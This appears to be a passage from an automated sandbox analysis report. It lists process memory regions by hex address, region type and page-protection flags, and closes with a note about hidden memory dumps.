page read and write
|
||
|
25BDF000
|
unclassified section
|
page execute and read and write
|
||
|
18843AD0000
|
trusted library allocation
|
page read and write
|
||
|
44E0000
|
trusted library allocation
|
page read and write
|
||
|
DE0000
|
unkown
|
page readonly
|
||
|
7FC1000
|
heap
|
page read and write
|
||
|
2377B000
|
stack
|
page read and write
|
||
|
560000
|
unkown
|
page readonly
|
||
|
2EED000
|
stack
|
page read and write
|
||
|
7A8E000
|
heap
|
page read and write
|
||
|
806F000
|
stack
|
page read and write
|
||
|
542E000
|
stack
|
page read and write
|
||
|
7FD3000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
48BC000
|
stack
|
page read and write
|
||
|
727F000
|
stack
|
page read and write
|
||
|
2DDB000
|
stack
|
page read and write
|
||
|
8880000
|
direct allocation
|
page read and write
|
||
|
1C0A74BE000
|
heap
|
page read and write
|
||
|
1C0A75C0000
|
heap
|
page read and write
|
||
|
18843AD0000
|
trusted library allocation
|
page read and write
|
||
|
7790000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
B80000
|
unkown
|
page readonly
|
||
|
81D0000
|
direct allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
6CA5000
|
heap
|
page execute and read and write
|
||
|
2D27000
|
heap
|
page read and write
|
||
|
577000
|
unkown
|
page readonly
|
||
|
93C000
|
stack
|
page read and write
|
||
|
48F1000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
56E000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
18842320000
|
heap
|
page read and write
|
||
|
7FC1000
|
heap
|
page read and write
|
||
|
25F6FAF000
|
stack
|
page read and write
|
||
|
1C0A9070000
|
heap
|
page execute and read and write
|
||
|
77F0000
|
trusted library allocation
|
page read and write
|
||
|
1C0A9100000
|
heap
|
page read and write
|
||
|
2AA8000
|
heap
|
page read and write
|
||
|
2C40000
|
heap
|
page read and write
|
||
|
1C0C1807000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
8330000
|
trusted library allocation
|
page read and write
|
||
|
13EFE765000
|
heap
|
page read and write
|
||
|
8220000
|
heap
|
page read and write
|
||
|
6D2E000
|
stack
|
page read and write
|
||
|
5028000
|
system
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
3143000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
BA7648D000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
692E000
|
stack
|
page read and write
|
||
|
7FFD9B920000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
577000
|
unkown
|
page readonly
|
||
|
1C0C18B9000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
26BB000
|
stack
|
page read and write
|
||
|
1C0A8E70000
|
trusted library allocation
|
page read and write
|
||
|
5B9C000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7A58000
|
heap
|
page read and write
|
||
|
30DF000
|
heap
|
page read and write
|
||
|
6FBE000
|
stack
|
page read and write
|
||
|
575000
|
unkown
|
page read and write
|
||
|
3130000
|
trusted library allocation
|
page read and write
|
||
|
BA4000
|
heap
|
page read and write
|
||
|
2072000
|
system
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2970000
|
heap
|
page read and write
|
||
|
BD0000
|
heap
|
page read and write
|
||
|
1C0A7495000
|
heap
|
page read and write
|
||
|
236BF000
|
stack
|
page read and write
|
||
|
7FFD9B83C000
|
trusted library allocation
|
page execute and read and write
|
||
|
2604000
|
heap
|
page read and write
|
||
|
8320000
|
trusted library allocation
|
page read and write
|
||
|
1C0B976B000
|
trusted library allocation
|
page read and write
|
||
|
7A11000
|
heap
|
page read and write
|
||
|
4F5D000
|
stack
|
page read and write
|
||
|
BFF000
|
heap
|
page read and write
|
||
|
79FD000
|
heap
|
page read and write
|
||
|
4590000
|
trusted library allocation
|
page execute and read and write
|
||
|
7FFD9BA50000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9B990000
|
trusted library allocation
|
page read and write
|
||
|
6F10000
|
direct allocation
|
page read and write
|
||
|
1C0C1489000
|
heap
|
page read and write
|
||
|
18843C30000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
3140000
|
trusted library allocation
|
page read and write
|
||
|
714E000
|
stack
|
page read and write
|
||
|
4C8F000
|
stack
|
page read and write
|
||
|
920000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7770000
|
trusted library allocation
|
page execute and read and write
|
||
|
8850000
|
direct allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
88A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
800000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9B79B000
|
trusted library allocation
|
page read and write
|
||
|
25F6F2F000
|
stack
|
page read and write
|
||
|
741E000
|
heap
|
page read and write
|
||
|
48C0000
|
trusted library allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
AD0000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4E7C000
|
unclassified section
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A9999000
|
trusted library allocation
|
page read and write
|
||
|
7DF4DE0A0000
|
trusted library allocation
|
page execute and read and write
|
||
|
7A0E000
|
heap
|
page read and write
|
||
|
1170000
|
unkown
|
page readonly
|
||
|
BA74F7E000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
AD0000
|
heap
|
page read and write
|
||
|
703E000
|
stack
|
page read and write
|
||
|
4C3E000
|
stack
|
page read and write
|
||
|
2F6E000
|
stack
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
2DD7000
|
heap
|
page read and write
|
||
|
AF0000
|
heap
|
page read and write
|
||
|
476C000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7FFD9B836000
|
trusted library allocation
|
page read and write
|
||
|
A628000
|
direct allocation
|
page execute and read and write
|
||
|
93C000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
23963000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
7620000
|
trusted library allocation
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4F5E000
|
unkown
|
page execute and read and write
|
||
|
7A72000
|
heap
|
page read and write
|
||
|
1C0C17A0000
|
heap
|
page read and write
|
||
|
DDF000
|
stack
|
page read and write
|
||
|
B40000
|
unkown
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2710000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
3420000
|
heap
|
page read and write
|
||
|
1C0A747D000
|
heap
|
page read and write
|
||
|
7FFD9B784000
|
trusted library allocation
|
page read and write
|
||
|
2D30000
|
heap
|
page read and write
|
||
|
2922000
|
unkown
|
page read and write
|
||
|
5264000
|
unclassified section
|
page read and write
|
||
|
2AB7000
|
heap
|
page read and write
|
||
|
B60000
|
unkown
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2BABAE60000
|
heap
|
page read and write
|
||
|
314D000
|
trusted library allocation
|
page execute and read and write
|
||
|
7630000
|
trusted library allocation
|
page read and write
|
||
|
236D0000
|
heap
|
page read and write
|
||
|
763A000
|
trusted library allocation
|
page read and write
|
||
|
446FBFE000
|
stack
|
page read and write
|
||
|
29DE000
|
unkown
|
page read and write
|
||
|
9B0000
|
unkown
|
page readonly
|
||
|
2770000
|
unkown
|
page readonly
|
||
|
26F9000
|
stack
|
page read and write
|
||
|
8097000
|
heap
|
page read and write
|
||
|
2D10000
|
direct allocation
|
page read and write
|
||
|
79ED000
|
heap
|
page read and write
|
||
|
1C0B9481000
|
trusted library allocation
|
page read and write
|
||
|
1C0C18B5000
|
heap
|
page read and write
|
||
|
B11000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
5F0000
|
unkown
|
page readonly
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
741B000
|
heap
|
page read and write
|
||
|
8310000
|
trusted library allocation
|
page execute and read and write
|
||
|
2C70000
|
heap
|
page read and write
|
||
|
1C0C1899000
|
heap
|
page read and write
|
||
|
6EBD000
|
stack
|
page read and write
|
||
|
86A000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A75E0000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2C57000
|
heap
|
page read and write
|
||
|
2FFF000
|
unkown
|
page read and write
|
||
|
4850000
|
direct allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
B30000
|
heap
|
page read and write
|
||
|
2BABAE80000
|
heap
|
page read and write
|
||
|
6CA0000
|
heap
|
page execute and read and write
|
||
|
18842323000
|
heap
|
page read and write
|
||
|
25BC000
|
stack
|
page read and write
|
||
|
723E000
|
stack
|
page read and write
|
||
|
BA0000
|
heap
|
page read and write
|
||
|
1C0A7458000
|
heap
|
page read and write
|
||
|
56E000
|
unkown
|
page readonly
|
||
|
4B21000
|
direct allocation
|
page execute and read and write
|
||
|
7FFD9BA30000
|
trusted library allocation
|
page read and write
|
||
|
BA7527D000
|
stack
|
page read and write
|
||
|
18843FBE000
|
trusted library allocation
|
page read and write
|
||
|
18843E0A000
|
trusted library allocation
|
page read and write
|
||
|
1C0A8F84000
|
heap
|
page read and write
|
||
|
2DA0000
|
heap
|
page read and write
|
||
|
2862000
|
unkown
|
page read and write
|
||
|
1C0A8F80000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0A99D6000
|
trusted library allocation
|
page read and write
|
||
|
536E000
|
stack
|
page read and write
|
||
|
2600000
|
heap
|
page read and write
|
||
|
23D3E000
|
direct allocation
|
page execute and read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
3210000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4DEE000
|
stack
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
1C0C15DD000
|
heap
|
page read and write
|
||
|
18843AD0000
|
trusted library allocation
|
page read and write
|
||
|
2C62000
|
heap
|
page read and write
|
||
|
2B01000
|
heap
|
page read and write
|
||
|
4BB3000
|
unclassified section
|
page read and write
|
||
|
467E000
|
stack
|
page read and write
|
||
|
18843D00000
|
trusted library allocation
|
page read and write
|
||
|
AA0000
|
unkown
|
page read and write
|
||
|
BB0000
|
unkown
|
page read and write
|
There are 1043 hidden memdumps, click here to show them.